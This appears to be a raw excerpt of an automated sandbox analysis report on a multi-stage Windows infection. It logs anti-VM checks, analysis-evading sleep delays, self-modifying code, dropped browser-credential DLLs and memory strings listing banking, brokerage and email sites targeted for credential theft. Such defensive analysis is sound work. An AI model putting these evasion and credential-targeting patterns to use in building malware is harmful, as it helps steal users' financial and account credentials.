Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 71EB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 93DBF9 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Memory allocated: 4C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2610000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2850000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2E20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Memory allocated: 1290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Memory allocated: 4CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Memory allocated: EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Memory allocated: 4BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Memory allocated: 900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Memory allocated: 2670000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Memory allocated: 2530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory allocated: 12E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory allocated: 2D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory allocated: 4D70000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\7.exe

Code function: 9_2_05620B32 rdtsc

9_2_05620B32

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Window / User API: threadDelayed 2412	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Window / User API: threadDelayed 7377	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1091	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1135	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1157	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1155	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1166	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1161	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1147	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 463
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Window / User API: threadDelayed 9501
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5881
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1369
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Window / User API: threadDelayed 1437
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Window / User API: threadDelayed 378
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Window / User API: threadDelayed 4261
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Window / User API: threadDelayed 4978

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	API coverage: 3.2 %

Source: C:\Users\user\Desktop\1Vkf7silOj.exe TID: 5404	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7368	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6.exe TID: 7864	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8116	Thread sleep count: 1091 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8116	Thread sleep time: -2183091s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8132	Thread sleep count: 1135 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8132	Thread sleep time: -2271135s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8084	Thread sleep count: 230 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8084	Thread sleep time: -6900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8140	Thread sleep count: 1157 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8140	Thread sleep time: -2315157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8136	Thread sleep count: 1155 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8136	Thread sleep time: -2311155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8128	Thread sleep count: 1166 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8128	Thread sleep time: -2333166s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8112	Thread sleep count: 1161 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8112	Thread sleep time: -2323161s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8124	Thread sleep count: 1147 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 8124	Thread sleep time: -2295147s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7736	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3076	Thread sleep count: 463 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7836	Thread sleep time: -115000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 1660	Thread sleep count: 9501 > 30
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 1660	Thread sleep time: -285030000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe TID: 8044	Thread sleep time: -540000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep count: 5881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep count: 3873 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8492	Thread sleep count: 1369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496	Thread sleep count: 120 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe TID: 744	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe TID: 8736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe TID: 7308	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe TID: 7940	Thread sleep count: 4261 > 30
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe TID: 7940	Thread sleep count: 4978 > 30
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe TID: 8916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe TID: 5792	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\7.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_00169BD3 FindFirstFileExW,		12_2_00169BD3
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0062DAAD FindFirstFileExW,		18_2_0062DAAD

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_005F7CE0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

18_2_005F7CE0

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000151D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWy
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Explorers.exe, 0000002A.00000002.1954319592.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Explorers.exe, 0000002A.00000002.1954319592.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.16.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.16.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.16.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: axplong.exe, axplong.exe, 0000000B.00000002.1682107353.0000000000891000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual USB Mouse
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 123.exe, 00000028.00000002.2064638926.0000000001012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.16.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 7.exe, 00000009.00000002.1629385074.0000000000E31000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 0000000A.00000002.3790210564.0000000000891000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 0000000B.00000002.1682107353.0000000000891000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: Amcache.hve.16.dr	Binary or memory string: VMware
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 123.exe, 00000028.00000002.2069186496.000000000319B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231LR
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: svchost.exe, 00000006.00000002.3155079468.00000200BEC5B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000A.00000002.3793682426.0000000001153000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000A.00000002.3793682426.0000000001110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791446115.000001496ECA4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794981942.000001496FA00000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000013.00000002.3791168067.000000000151D000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000013.00000002.3791168067.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
